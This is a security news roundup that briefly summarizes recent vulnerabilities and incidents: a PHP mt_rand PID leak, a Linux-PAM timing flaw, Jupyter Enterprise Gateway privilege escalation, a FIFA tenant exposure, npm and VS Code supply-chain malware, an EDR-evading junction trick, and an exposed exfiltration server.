PHP 7 mt_rand leaks PID, Linux PAM bleeds plaintext passwords

By dissecting PHP 7.0’s seed generation for mt_rand, researchers show the PID is baked into the seed along with time and LCG state. If an attacker can guess the call time, they can recover the process ID from a single random output, exposing a new side‑channel in many PHP apps.

CVE-2026-54411 affects Linux-PAM 1.7.2: the pam_userdb module leaks password length and prefix bytes via a timing discrepancy in its plaintext comparison. An attacker who can repeatedly trigger authentication can recover the full password when pam_userdb is configured with crypt=none or an unrecognized method.

Researchers uncovered three CVE‑rated vulnerabilities in Jupyter Enterprise Gateway that let any notebook user escalate to full cluster admin, read secrets, mount host filesystems, and spawn privileged pods. The issue stems from a privileged service account the gateway uses to launch kernels. A patched release (v3.3.0) is now available.

A security researcher signed up as a FIFA player agent and was automatically added to FIFA’s Microsoft Entra tenant. By bypassing client‑side checks, he accessed the live Football Data Platform and the Streaming Management panel, exposing every World Cup match’s camera feeds and stream keys. The flaw shows how external registrations can grant unchecked internal access.

An attacker stole a Mastra maintainer account and republished 116 packages within 27 minutes, inserting a hidden dependency on easy-day-js. The typosquatted module runs a post‑install dropper that disables TLS validation and fetches a second‑stage payload, affecting roughly 28 million monthly downloads.

GhostTree creates self‑referencing junctions that generate endless valid paths, causing Microsoft Defender and other EDR tools to loop forever during folder scans. The result is malware hidden in the same directory stays undetected until the scan times out or is aborted. This technique requires only write access, no admin rights.

Security researchers uncovered a VS Code Marketplace extension, jupyter-powerdev, that contains a multi-stage backdoor linked to DPRK intelligence. The malware uses Microsoft Graph and SharePoint for encrypted C2, and deploys Windows and Linux agents to exfiltrate code and execute commands. Its supply-chain placement puts any developer who installs it at instant risk.

Researchers at Deep Specter reported two design issues, commit‑timestamp backdating and unverified author metadata, that let Shai‑Hulud variants hide in 516 malicious packages and compromise over 200 developer accounts. GitHub labeled the reports ineligible, citing that the behaviors are inherent to Git and not bugs, leaving the supply‑chain threat unchecked.

Hunt.io discovered an unsecured Python SimpleHTTP server in the Netherlands hosting over 5 GB of exfiltrated files, including LA Metro’s SCADA database backups and Israeli victim data. The dump reveals detailed transit operations, personnel records, and plaintext credentials, exposing critical infrastructure and highlighting the threat actor Ababil of Minab’s aggressive campaign.